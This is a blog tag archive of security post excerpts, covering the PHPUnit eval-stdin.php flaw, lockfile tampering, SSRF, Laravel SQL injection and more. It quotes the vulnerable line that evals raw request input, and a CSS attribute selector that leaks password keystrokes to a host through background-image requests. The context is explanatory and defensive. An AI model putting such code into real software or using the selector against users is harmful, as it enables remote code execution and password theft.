The author of PHPUnit was a bit surprised when he received a mail stating that PHPUnit was a security risk and hackers could remotely execute PHP code through a file named eval-stdin.php that ships used to ship with PHPUnit. // eval-stdin.php eval ('?>'. \file_get_contents('php://input')); Even though the eval-stdin.php file itself indeed was vulnerable, it never […]
Tag Archives: security
Beware when merging Pull Requests with a changed lockfile
When watching a diff that contains a lockfile (say: a yarn.lock for example) on GitHub, GitHub doesn’t always show the differences (see screenshot above) as the changes in such files tend to be quite big. And even if it were to show the changes, does one really take a close look into it? With this […]
Securing React Native Applications
In this article, we will focus on the security side of the framework. We will be dividing the article into the following sections: Securing app to server connection Securing local data Advanced integrity checks Securing React Native Applications →
Princesses make terrible passwords
From the Firefox Blog: When the Disney+ streaming service rolled out, millions of people flocked to set up accounts. And within a week, thousands of poor unfortunate souls reported that their Disney passwords were hacked. According to media reports, some Disney+ account holders have lost their account access while hackers have sold their logins online. […]
Learn about security by hacking a fake bank using a real hacking method
Cool interactive site showing your how to perform a Server Side Request Forgery hack, based on a true incident: The following interactive tutorial is a reconstruction of Capital One’s data breach incident that exposed the records of almost 106 million customers. Paige Thompson is accused of breaking into a Capital One server and gaining access […]
Unsafe SQL functions in Laravel
Recently the folks from Spatie released a security update for their laravel-query-builder package. Turns out it was vulnerable to SQL Injection. At the core of the vulnerability is the fact that Laravel offers a shorthand for querying only certain fields of JSON data, but that these do not get escaped when converted to a json_extract […]
The curious case of the Raspberry Pi in the network closet
Christian Haschek: Last week I got a message from a co-worker notifying me there was a Raspberry Pi connected to our network. I asked my IT colleagues and they were as baffled as I was. I heard of people getting paid to put things like this in places they shouldn’t and for this reason I […]
The problem with usernames
In “Let’s talk about usernames” James Bennett – author of django-registration – digs deeper into an at first seemingly simple thing such as usernames and how to keep ‘m safe and unique. And no, you can’t make it by just doing a a simple comparison. You’ll have to think of more than that if you […]
CSS Keylogger (and why you shouldn’t worry about it)
Leveraging CSS attribute selectors it – in theory – is possible to write a keylogger in pure CSS. The selector below for example targets all input[type=”password”] elements whose last character is an a: input[type=”password”][value$=”a”] { background-image: url(“http://localhost:3000/a”); } The theory goes that whenever a user presses the a character inside an input[type=”password”], a request to […]
Extended Validation Is Broken
https://stripe.ian.sh/ is an interesting site by Ian Carroll. See it? Take a closer look at the certificate. Yes, that’s one for “Stripe, Inc” … but, that’s not “Stripe, Inc” is it? This site uses an EV certificate for “Stripe, Inc”, that was legitimately issued by Comodo. However, when you hear “Stripe, Inc”, you are probably […]